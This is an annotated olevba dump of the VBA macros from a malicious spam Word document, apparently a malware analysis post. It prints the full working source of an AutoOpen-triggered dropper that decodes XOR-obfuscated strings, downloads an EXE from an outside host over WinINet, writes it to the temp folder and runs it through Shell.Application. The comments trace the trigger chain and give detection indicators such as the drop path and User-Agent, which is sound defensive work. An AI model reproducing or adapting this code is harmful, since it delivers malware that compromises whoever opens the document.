dynamoo

Malicious Word macro (olevba 0.25 output): AutoOpen-triggered, XOR-obfuscated WinINet downloader that writes an EXE to the temp folder and launches it via Shell.Application

Apr 28th, 2015
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASIHB- spam.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: spam.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: spam.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  ' Hop 2 of the trigger chain (called from autoopen). MARCELINO is never
  ' read; the only effect is the call to NEWTON in CLAY.bas.
  16. Sub DANNIE(MARCELINO As Integer)
  17. NEWTON
  18. End Sub
  19.  
  ' Auto-executing entry point: Word runs autoopen as soon as the document is
  ' opened with macros enabled. Full chain from here:
  '   autoopen -> DANNIE -> NEWTON -> FREDERIC -> CAROL -> ZACHARIAH -> IVORY
  '   (IVORY: decode drop path, VALENTIN downloads, JAMEL executes).
  ' The literal 286 is noise; DANNIE ignores its argument.
  20. Sub autoopen()
  21. DANNIE (286)
  22. End Sub
  23. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  24. ANALYSIS:
  25. +----------+----------+---------------------------------------+
  26. | Type     | Keyword  | Description                           |
  27. +----------+----------+---------------------------------------+
  28. | AutoExec | AutoOpen | Runs when the Word document is opened |
  29. +----------+----------+---------------------------------------+
  30. -------------------------------------------------------------------------------
  31. VBA MACRO AMOS.bas
  32. in file: spam.doc - OLE stream: u'Macros/VBA/AMOS'
  33. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  34.  
  35.  
  ' 64-bit-only API import: DORIAN = wininet!InternetCloseHandle. The 32-bit
  ' Declare for the same alias is in DEXTER.bas under #Else, so exactly one
  ' definition survives conditional compilation on either bitness. The
  ' imports are renamed (DORIAN/ANDREA/BORIS/EUGENIO) and spread over four
  ' modules, presumably to break simple string matching; the Alias clause
  ' still exposes the real API name and is what olevba keyed on.
  36. #If VBA7 And Win64 Then
  37. Public Declare PtrSafe Function DORIAN Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef ERROL As LongPtr) As Long
  38. #End If
  39.  
  ' Dropper core: builds <temp folder> & <decoded SHIRLEY>, downloads the
  ' payload there (VALENTIN) and launches it (JAMEL).
  ' LAZARO (ByRef) is overwritten with the temp-folder object; HOMER is the
  ' FileSystemObject created by ZACHARIAH but is never used here (LAURENCE is
  ' called again, creating a second FSO instance).
  ' Return value is whatever JAMEL returns; JAMEL never assigns its result,
  ' so this is effectively always False.
  40. Public Function IVORY(ByRef LAZARO As Object, ByRef HOMER As Object) As Boolean
  41.  
  42. Dim NEWTONON As Long
  ' LAZARO = FSO.GetSpecialFolder(2), i.e. the temporary folder.
  43. Set LAZARO = IGNACIO(LAURENCE)
  44.  
  45. Dim ADOLFO
  46.  
  47. Dim ALPHONSE As String
  ' XOR-decode SHIRLEY with key HORACIO; decoding by hand gives
  ' "\john3.2.b.exe" (confirm with a scripted decode of RICHIE). The 4096
  ' argument is unused noise.
  48. ALPHONSE = MARCELO(4096, HORACIO, SHIRLEY)
  49.  
  ' Filler loop: mutates its own loop variable, result never read.
  50. For NEWTONON = 6 To 8
  51. NEWTONON = NEWTONON * 55
  52. Next NEWTONON
  ' Folder object & String: presumably relies on the Folder object's default
  ' property (Path) so ADOLFO becomes "<temp>\john3.2.b.exe".
  53. ADOLFO = LAZARO & ALPHONSE
  54.  
  ' Download to ADOLFO. The Boolean result is discarded, so the launch below
  ' is attempted even when the download failed.
  55. If VALENTIN(354, ADOLFO) Then
  56. End If
  57.  
  58.  
  ' Shell.Application.Open on the dropped path = execute the payload.
  59. IVORY = JAMEL(LAZARO, ALPHONSE, 213)
  60.  
  61. End Function
  62.  
  63.  
  ' Effectively Val(FRANCES). The only caller (NORDEWITTO) passes "&H" + two
  ' hex digits, so this converts one hex byte of ciphertext to a number.
  ' The loop is dead weight: DILLON is overwritten by Val() right after it.
  64. Public Function ANIBAL(FRANCES As String) As Double
  65. Dim DILLON As Double
  66. For DILLON = 13 To 19
  67. DILLON = DILLON * 4.5
  68. Next DILLON
  69. DILLON = Val(FRANCES)
  70. ANIBAL = DILLON
  71. End Function
  72.  
  ' Wraps FileSystemObject.GetSpecialFolder(2). In the FSO SpecialFolder enum
  ' 2 is TemporaryFolder, so the payload is dropped into the user's temp
  ' directory (the TEMP/TMP location) -- the place to look during triage.
  73. Public Function IGNACIO(ByRef NICHOLAS As Object) As Object
  74. Set IGNACIO = NICHOLAS.GetSpecialFolder(2)
  75. End Function
  76.  
  77. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  78. ANALYSIS:
  79. +------------+-------------+-------------------------+
  80. | Type       | Keyword     | Description             |
  81. +------------+-------------+-------------------------+
  82. | Suspicious | Lib         | May run code from a DLL |
  83. | IOC        | wininet.dll | Executable file name    |
  84. +------------+-------------+-------------------------+
  85. -------------------------------------------------------------------------------
  86. VBA MACRO CLAY.bas
  87. in file: spam.doc - OLE stream: u'Macros/VBA/CLAY'
  88. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  89.  
  ' 64-bit import: ANDREA = wininet!InternetOpenA (opens the WinINet session;
  ' called from EFRAIN in DEXTER.bas). The 32-bit Declare is in DEXTER.bas.
  90. #If VBA7 And Win64 Then
  91. Public Declare PtrSafe Function ANDREA Lib "wininet.dll" Alias "InternetOpenA" (ByVal EMILE As String, ByVal MONROE As Long, ByVal DOMINIQUE As String, ByVal TRISTANO As String, ByVal BOOKER As Long) As LongPtr
  92. #End If
  93.  
  94.  
  ' Returns the FRITZ-th byte (1-based) of the hex string JEROLD as a number:
  ' Mid$(JEROLD, 2*FRITZ-1, 2) is the two-character hex pair and the "&H"
  ' prefix makes Val() parse it as hexadecimal. This is the ciphertext byte
  ' consumed by RICHIE. The literal 78 is ignored by ROSENDO.
  95. Public Function NORDEWITTO(ByRef JEROLD As String, ByRef FRITZ As Long) As Double
  96.  NORDEWITTO = ANIBAL("&H" & (ROSENDO(78, JEROLD, NAPOLEON(FRITZ), 2)))
  97. End Function
  98.  
  99.  
  ' Maps a 1-based byte index to the 1-based position of that byte's first
  ' hex digit in the encoded string (byte i starts at character 2i-1).
  100. Public Function NAPOLEON(ByRef FRITZ As Long) As Long
  101.  NAPOLEON = (2 * FRITZ) - 1
  102. End Function
  103.  
  104.  
  ' The string decoder behind every obfuscated constant in this sample.
  ' JEROLD:     hex-encoded ciphertext (BRICE, SHIRLEY, PRINCE or PORFIRIO).
  ' CHRISTOPER: key; every caller passes HORACIO = "MOHAMEDDELMER2".
  ' For byte i (1-based) of the ciphertext the output character is
  '   Chr$( hexbyte_i Xor Asc(Mid$(key, (i Mod Len(key)) + 1, 1)) )
  ' i.e. repeating-key XOR with the key index offset by one (byte 1 uses key
  ' character 2). Reimplement this in a few lines of Python to recover the
  ' plaintexts instead of running the macro; hand-decoded values are noted
  ' next to the constants in CORNELIUS.bas.
  105. Public Function RICHIE(CHRISTOPER As String, JEROLD As String) As String
  106.    
  107.     Dim TANNER As Integer
  108.     Dim JARRED As Integer
  109.    
  110.    
  111.     Dim JOSIAH As Double
  112.  JOSIAH = 213
  ' Opaque predicate: 213 > 639 is never true, so End never executes.
  113. If JOSIAH > JOSIAH * 3 Then End
  114.    
  115.     Dim FRITZ As Long
  116.     Dim BRANT As String
  ' One iteration per ciphertext byte (two hex characters).
  117.     For FRITZ = 1 To (LEOPOLDO(JEROLD) / 2)
  118.         TANNER = NORDEWITTO(JEROLD, FRITZ) ' ciphertext byte
  119.         JARRED = PRINCEE(CHRISTOPER, FRITZ) ' cycling key byte
  120.         BRANT = BRANT + EDGARDO(TANNER, JARRED) ' Chr$(TANNER Xor JARRED)
  121.     Next FRITZ
  122.    RICHIE = BRANT
  123. End Function
  124.  
  125.  
  ' Thin wrapper: MARCELO(x, key, cipher) = RICHIE(key, cipher).
  ' AUGUSTUS is junk: doubled and never read. It is passed ByRef (the VBA
  ' default) but every caller supplies a literal, so nothing outside changes.
  126. Public Function MARCELO(AUGUSTUS As Long, HILARIO As String, ENRIQUE As String) As String
  127. AUGUSTUS = AUGUSTUS * 2
  128. MARCELO = RICHIE(HILARIO, ENRIQUE)
  129.    
  130. End Function
  131.  
  132.  
  ' Hop 3 of the trigger chain (called by DANNIE). DEWITT and the JAMAAL loop
  ' are filler; the only real work is the call to FREDERIC in CORNELIUS.bas,
  ' which ignores its argument.
  133. Public Sub NEWTON()
  134.         Dim DEWITT As Double
  135.  
  136.     Dim JAMAAL As Double
  137. For JAMAAL = 36 To 39
  138. JAMAAL = JAMAAL + 21
  139. Next JAMAAL
  140.  
  141. FREDERIC (2.81)
  142.  
  143. End Sub
  144.  
  ' Hop 6 of the trigger chain (called by CAROL): creates the
  ' Scripting.FileSystemObject via LAURENCE and hands it, with an empty
  ' object variable, to IVORY, which performs the download and launch.
  ' The local `Dim MARCELO As Object` shadows the module-level function
  ' MARCELO inside this scope; it starts as Nothing and is filled in by IVORY
  ' through its ByRef LAZARO parameter. REINALDO and LEWIS are never read;
  ' the JERROD loops and the `JERROD > JERROD * 3` test are filler (false for
  ' any positive JERROD, so End never fires).
  145. Public Function ZACHARIAH(REINALDO As Double)
  146.  
  147. Dim MARCELO As Object
  148.  
  149.  
  150.     Dim JERROD As Long
  151. For JERROD = 17 To 21
  152. JERROD = JERROD + 33
  153. Next JERROD
  154.    
  155.  
  156. Dim WESTON  As Object
  157.  
  158.  
  159. For JERROD = 11 To 21
  160. JERROD = JERROD + 64
  161. Next JERROD
  162.    
  163.  
  ' WESTON = CreateObject("Scripting.FileSystemObject") (see LAURENCE).
  164. Set WESTON = LAURENCE
  165. JERROD = JERROD + 42
  166. Dim LEWIS As Boolean
  167.  
  168. If JERROD > JERROD * 3 Then End
  ' Download-and-execute happens inside IVORY (AMOS.bas).
  169. LEWIS = IVORY(MARCELO, WESTON)
  170. REINALDO = REINALDO + 35
  171. End Function
  172.  
  173.  
  ' Hop 5 of the trigger chain (called by FREDERIC). MERLIN and the BRENTON
  ' string building are decoys; the only effect is the call to ZACHARIAH.
  ' No return value is ever assigned.
  174. Public Function CAROL(MERLIN As String)
  175. Dim BRENTON As String
  176. BRENTON = "YONG"
  177. ZACHARIAH 21 + 3.21
  178. BRENTON = BRENTON + "FAUSTINO"
  179. End Function
  180.  
  181.  
  182.  
  183.  
  184.  
  185.  
  186. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  187. ANALYSIS:
  188. +------------+----------------+-----------------------------------------+
  189. | Type       | Keyword        | Description                             |
  190. +------------+----------------+-----------------------------------------+
  191. | Suspicious | Lib            | May run code from a DLL                 |
  192. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  193. |            |                | may be used to obfuscate strings        |
  194. |            |                | (option --decode to see all)            |
  195. | IOC        | wininet.dll    | Executable file name                    |
  196. +------------+----------------+-----------------------------------------+
  197. -------------------------------------------------------------------------------
  198. VBA MACRO ROLANDO.bas
  199. in file: spam.doc - OLE stream: u'Macros/VBA/ROLANDO'
  200. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  201.  
  202.  
  203.  
  204.  
  ' Returns CreateObject(<PORFIRIO decoded with key HORACIO>). Hand-decoding
  ' PORFIRIO through RICHIE yields "Scripting.FileSystemObject" (confirm with
  ' a scripted decode), so this is the FSO later used to find the temp folder.
  ' Called twice per run (ZACHARIAH and IVORY).
  205. Public Function LAURENCE() As Object
  206. Dim ISMAEL As String
  207. ISMAEL = RICHIE(HORACIO, PORFIRIO)
  208. Set LAURENCE = CreateObject(ISMAEL)
  209. End Function
  210.  
  211.  
  ' Downloads the payload with WinINet and writes it to MARQUIS (the drop
  ' path built in IVORY). WYATT and KAREEM are unused. Returns True only when
  ' at least one byte was received.
  ' Sequence: InternetOpenA (EFRAIN) -> InternetOpenUrlA on the decoded
  ' payload URL (JAMAR) -> InternetReadFile loop with a 4800-byte buffer
  ' (BORIS, EFREN) -> Open/Put the accumulated bytes to MARQUIS ->
  ' InternetCloseHandle on both handles (DORIAN).
  ' Network signature: plain HTTP, direct access type (no proxy), User-Agent
  ' "CLAUDIO" (ANTWAN) and INTERNET_FLAG_NO_CACHE_WRITE, so the download is
  ' not left in the WinINet cache -- the on-disk drop is the main artefact.
  212. Public Function VALENTIN(WYATT As Long, ByVal MARQUIS As String) As Boolean
  213.     #If VBA7 And Win64 Then
  214.         Dim LANNY As LongPtr, EZRA As LongPtr
  215.     #Else
  216.         Dim LANNY As Long, EZRA As Long
  217.     #End If
  218.     Dim SYDNEY As Long
  219.     Dim RUBIN As String * EFREN, EMILE As String ' fixed-length 4800-char receive buffer
  220.     Dim ARON As Integer, ELMO As Double
  221.     LANNY = EFRAIN ' hInternet from InternetOpenA; 0 = failure
  222.     If LANNY = 0 Then
  223.         Exit Function
  224.     End If
  225.     Dim KAREEM As Boolean
  226.    
  ' JAMAR always returns True; EZRA receives the InternetOpenUrlA handle.
  227.     If JAMAR(EZRA, LANNY) Then
  228.     End If
  229.     If EZRA = 0 Then
  230.         ELMO = 0
  231.     Else
  232.         BORIS EZRA, RUBIN, EFREN, SYDNEY ' first InternetReadFile; SYDNEY = bytes read
  ' The first chunk copies the whole fixed-length buffer regardless of
  ' SYDNEY, unlike the loop below which trims to SYDNEY. If the first read
  ' returned fewer than 4800 bytes the written file carries the buffer's
  ' unfilled tail, so its hash may not match what the server serves.
  233.         EMILE = RUBIN
  234.           Dim GAIL As Long
  235.           GAIL = 0
  236.           GAIL = GAIL + 21
  ' Opaque predicate: 21 > 65 is never true.
  237. If GAIL > GAIL + 44 Then End
  238.         Do While SYDNEY <> 0 ' read until InternetReadFile reports 0 bytes
  239.             BORIS EZRA, RUBIN, EFREN, SYDNEY
  240.                     EMILE = EMILE + Mid(RUBIN, 1, SYDNEY)
  241.         Loop
  ' ELMO = Len(EMILE) (success flag); ARON = FreeFile, the "JOSEF" argument
  ' is ignored.
  242.              ELMO = LEOPOLDO(EMILE): _
  243.              ARON = EVERETTE("JOSEF")
  ' Write the download to the drop path with an exclusive write lock.
  244.         Open MARQUIS _
  245.             For Binary Access Write _
  246.         Lock Write As #ARON
  247.         Put #ARON, , EMILE
  248.         GAIL = GAIL + 62
  249.     If GAIL < 0 Then End
  250.         Close #ARON
  251.     End If
  252.     DORIAN EZRA ' InternetCloseHandle(hUrl)
  253.     DORIAN LANNY ' InternetCloseHandle(hInternet)
  254.     EMILE = ""
  255.     If ELMO Then
  256.         VALENTIN = True
  257.     End If
  258. End Function
  259.  
  260.  
  261.  
  ' Len() wrapper (string length); used for the decoder loop bound, the key
  ' cycle and the download size check.
  262. Public Function LEOPOLDO(JAYSON As String) As Long
  263. LEOPOLDO = Len(JAYSON)
  264. End Function
  265.  
  ' FreeFile wrapper: returns the next free file number. JAYSON is ignored.
  266. Public Function EVERETTE(JAYSON As String) As Integer
  267.     EVERETTE = FreeFile
  268. End Function
  269.  
  ' Key-stream byte for position FRITZ: Asc of the key character at 1-based
  ' index (FRITZ Mod Len(key)) + 1, so the key cycles with a one-character
  ' offset (position 1 uses the key's second character). The literal 71 is
  ' ignored by ROSENDO.
  270. Public Function PRINCEE(ByRef CHRISTOPER As String, ByRef FRITZ As Long) As Integer
  271. PRINCEE = Asc(ROSENDO(71, CHRISTOPER, ((FRITZ Mod LEOPOLDO(CHRISTOPER)) + 1), 1))
  272. End Function
  273. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  274. ANALYSIS:
  275. +------------+--------------+-----------------------------------------+
  276. | Type       | Keyword      | Description                             |
  277. +------------+--------------+-----------------------------------------+
  278. | Suspicious | CreateObject | May create an OLE object                |
  279. | Suspicious | Open         | May open a file                         |
  280. | Suspicious | Write        | May write to a file (if combined with   |
  281. |            |              | Open)                                   |
  282. | Suspicious | Put          | May write to a file (if combined with   |
  283. |            |              | Open)                                   |
  284. | Suspicious | Binary       | May read or write a binary file (if     |
  285. |            |              | combined with Open)                     |
  286. +------------+--------------+-----------------------------------------+
  287. -------------------------------------------------------------------------------
  288. VBA MACRO CORNELIUS.bas
  289. in file: spam.doc - OLE stream: u'Macros/VBA/CORNELIUS'
  290. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  291.  
  292. Option Explicit
  293.  
  ' 64-bit import: BORIS = wininet!InternetReadFile (hFile, buffer, bytes to
  ' read, ByRef bytes read). Called in a loop by VALENTIN. 32-bit Declare is
  ' in DEXTER.bas.
  294. #If VBA7 And Win64 Then
  295. Public Declare PtrSafe Function BORIS Lib "wininet.dll" Alias "InternetReadFile" (ByVal WILFORD As LongPtr, ByVal RUBIN As String, ByVal SHELTON As Long, CARSON As Long) As Integer
  296. #End If
  ' Obfuscated string table. Each value is hex ciphertext for the
  ' repeating-key XOR decoder RICHIE(HORACIO, x). Hand-decoded plaintexts
  ' (verify with a scripted decode before using as IOCs):
  '   BRICE    -> "Shell.Application"          (JAMEL: launches the payload)
  '   SHIRLEY  -> "\john3.2.b.exe"             (IVORY: drop filename in temp folder)
  '   PRINCE   -> "http://massachusettsselfstorage[.]com/62/927.exe"
  '               (JAMAR: payload URL, defanged here)
  '   PORFIRIO -> "Scripting.FileSystemObject" (LAURENCE)
  ' HORACIO is the XOR key itself and is stored in clear.
  297. Public Const BRICE = "1C202421296A05353C212C31533926272F"
  298. Public Const SHIRLEY = "13222E25242A776B7E63277C57352A"
  299. Public Const PRINCE = "273C353D7F6B6B282D3E363351253A3B243931373720202B36265D3F2E2F2463262B296A7A7F6A6B007A612D3928"
  300. Public Const PORFIRIO = "1C2B332435302D2B2B63033B5E281C31323920290B2726282626"
  301. Public Const HORACIO = "MOHAMEDDELMER2"
  302.  
  303.  
  304.  
  ' WinINet parameters used by VALENTIN/EFRAIN/JAMAR:
  '   EFREN     - InternetReadFile chunk size (length of the fixed buffer RUBIN)
  '   ANTWAN    - lpszAgent for InternetOpenA, i.e. the HTTP User-Agent
  '               "CLAUDIO": a strong network detection signature for this sample
  '   ALDEN     - dwAccessType 1 = INTERNET_OPEN_TYPE_DIRECT (ignores proxy settings)
  '   MARGARITO - &H4000000 = INTERNET_FLAG_NO_CACHE_WRITE, passed to
  '               InternetOpenUrlA so no copy of the payload lands in the WinINet cache
  305. Public Const EFREN = 4800
  306. Public Const ANTWAN As String = "CLAUDIO"
  307. Public Const ALDEN = 1
  308. Public Const MARGARITO = &H4000000
  309.  
  ' Hop 4 of the trigger chain (called by NEWTON). ROSARIO is ignored; the
  ' only effect is the call to CAROL in CLAY.bas.
  310. Sub FREDERIC(ROSARIO As Double)
  311.  
  312. CAROL ("JUDSON")
  313. End Sub
  314.  
  ' XOR step of the decoder: Chr$(TANNER Xor JARRED), where TANNER is a
  ' ciphertext byte and JARRED the matching key byte (see RICHIE).
  315. Public Function EDGARDO(ByRef TANNER As Integer, ByRef JARRED As Integer) As String
  316.     Dim CONNIE As Long
  317.     CONNIE = TANNER Xor JARRED
  318.     EDGARDO = Chr$(CONNIE)
  319. End Function
  320.  
  321.  
  322.  
  323.  
  324.  
  325. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  326. ANALYSIS:
  327. +------------+----------------+-----------------------------------------+
  328. | Type       | Keyword        | Description                             |
  329. +------------+----------------+-----------------------------------------+
  330. | Suspicious | Lib            | May run code from a DLL                 |
  331. | Suspicious | Chr            | May attempt to obfuscate specific       |
  332. |            |                | strings                                 |
  333. | Suspicious | Xor            | May attempt to obfuscate specific       |
  334. |            |                | strings                                 |
  335. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
  336. |            |                | be used to obfuscate strings (option    |
  337. |            |                | --decode to see all)                    |
  338. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  339. |            |                | may be used to obfuscate strings        |
  340. |            |                | (option --decode to see all)            |
  341. | IOC        | wininet.dll    | Executable file name                    |
  342. +------------+----------------+-----------------------------------------+
  343. -------------------------------------------------------------------------------
  344. VBA MACRO DEXTER.bas
  345. in file: spam.doc - OLE stream: u'Macros/VBA/DEXTER'
  346. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  347.  
  348.  
  349.  
  350.  
  351.  
  ' JASPER is never referenced anywhere in the visible code (decoy).
  352. Public Const JASPER = "RUSSEL"
  ' API imports. 64-bit: only EUGENIO = wininet!InternetOpenUrlA lives here
  ' (DORIAN, ANDREA and BORIS are declared PtrSafe in AMOS, CLAY and
  ' CORNELIUS). 32-bit (#Else): all four WinINet imports are declared here
  ' with plain Long handles. Either way the sample has InternetOpenA,
  ' InternetOpenUrlA, InternetReadFile and InternetCloseHandle available on
  ' both Office bitnesses.
  353. #If VBA7 And Win64 Then
  354. Public Declare PtrSafe Function EUGENIO Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal MOHAMMED As LongPtr, ByVal SANDY As String, ByVal TRISTAN As String, ByVal BRIAN As Long, ByVal HOUSTON As Long, ByVal LINCOLN As Long) As LongPtr
  355.  
  356. #Else
  357. Public Declare Function DORIAN Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef ERROL As Long) As Long
  358. Public Declare Function ANDREA Lib "wininet.dll" Alias "InternetOpenA" (ByVal EMILE As String, ByVal MONROE As Long, ByVal DOMINIQUE As String, ByVal TRISTANO As String, ByVal BOOKER As Long) As Long
  359. Public Declare Function BORIS Lib "wininet.dll" Alias "InternetReadFile" (ByVal WILFORD As Long, ByVal RUBIN As String, ByVal SHELTON As Long, CARSON As Long) As Integer
  360. Public Declare Function EUGENIO Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal MOHAMMED As Long, ByVal SANDY As String, ByVal TRISTAN As String, ByVal BRIAN As Long, ByVal HOUSTON As Long, ByVal LINCOLN As Long) As Long
  361. #End If
  362.  
  ' Mid$(JAYSON, TANNER, JARRED) wrapper: JARRED characters of JAYSON
  ' starting at 1-based TANNER. SAMMY is junk: incremented and never read
  ' (both callers pass literals, so the ByRef write has no effect).
  363. Public Function ROSENDO(SAMMY As Long, ByRef JAYSON As String, ByRef TANNER As Integer, ByRef JARRED As Integer) As String
  364.     ROSENDO = Mid$(JAYSON, TANNER, JARRED)
  365.     SAMMY = SAMMY + 31
  366. End Function
  ' InternetOpenA("CLAUDIO", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0):
  ' opens the WinINet session with User-Agent "CLAUDIO" and direct (no proxy)
  ' access. Returns the hInternet handle, or 0 on failure (checked by
  ' VALENTIN). The #If/#Else only switches the return type between LongPtr
  ' (64-bit) and Long (32-bit); a single function header survives.
  367. #If VBA7 _
  368.     And Win64 Then
  369. Public Function EFRAIN() As LongPtr
  370.  #Else
  371. Public Function EFRAIN() As Long
  372.  
  373.  #End If
  374.  
  375.  EFRAIN = ANDREA(ANTWAN, ALDEN, vbNullString, vbNullString, 0)
  376. End Function
  377.  
  378.  
  379.  
  380.  
  ' Executes the dropped file: CreateObject(<BRICE decoded>) -- hand-decoded
  ' as "Shell.Application" -- then .Open(<temp folder> & <drop filename>).
  ' Note the "Open" keyword olevba flagged as "May open a file" is this
  ' Shell.Application.Open call, i.e. a ShellExecute-style launch of the
  ' payload, not a file read. RANDELL is unused; LENNY is undeclared (this
  ' module has no Option Explicit) so it is an implicit Variant; the return
  ' value is never assigned.
  381. Public Function JAMEL(ByRef LAZARO As Object, ByRef ALPHONSE As String, RANDELL As Double) As Boolean
  382.  
  383. Set LENNY = CreateObject(RICHIE _
  384. (HORACIO, BRICE))
  385. Dim DUSTY As Integer
  386. DUSTY = LENNY.Open(LAZARO & ALPHONSE)
  387. End Function
  388.  
  389.  
  ' Opens the payload URL. GRADY (ByRef) receives the InternetOpenUrlA
  ' handle; NOAH is the hInternet from EFRAIN. Always returns True, so the
  ' caller (VALENTIN) must test GRADY for 0 itself. The #If only switches
  ' the handle types between LongPtr and Long.
  390. #If VBA7 And Win64 Then
  391.        Public Function JAMAR(ByRef GRADY As LongPtr, NOAH As LongPtr) As Boolean
  392.     #Else
  393.        Public Function JAMAR(ByRef GRADY As Long, NOAH As Long) As Boolean
  394.     #End If
  395.         Dim JACQUES As Double
  396. Dim GUADALUPE As String
  397. Dim CLARK As Long
  ' Decode PRINCE with key HORACIO; hand-decoding gives
  ' http://massachusettsselfstorage[.]com/62/927.exe (defanged; confirm with
  ' a scripted decode). The 893 argument is noise.
  398.     GUADALUPE = MARCELO(893, HORACIO, PRINCE)
  399.  
  ' Filler loop; result never read. CLARK is never used.
  400. For JACQUES = 14 To 15
  401. JACQUES = JACQUES + 5.5
  402. Next JACQUES
  ' InternetOpenUrlA(hInternet, url, headers=NULL, headersLen=0,
  '                  INTERNET_FLAG_NO_CACHE_WRITE, context=0)
  403.     GRADY = EUGENIO(NOAH, GUADALUPE, vbNullString, 0, MARGARITO, 0)
  404.     JAMAR = True
  405. End Function
  406.  
  407.  
  408. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  409. ANALYSIS:
  410. +------------+----------------+-----------------------------------------+
  411. | Type       | Keyword        | Description                             |
  412. +------------+----------------+-----------------------------------------+
  413. | Suspicious | CreateObject   | May create an OLE object                |
  414. | Suspicious | Lib            | May run code from a DLL                 |
  415. | Suspicious | Open           | May open a file                         |
  416. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  417. |            |                | may be used to obfuscate strings        |
  418. |            |                | (option --decode to see all)            |
  419. | IOC        | wininet.dll    | Executable file name                    |
  420. +------------+----------------+-----------------------------------------+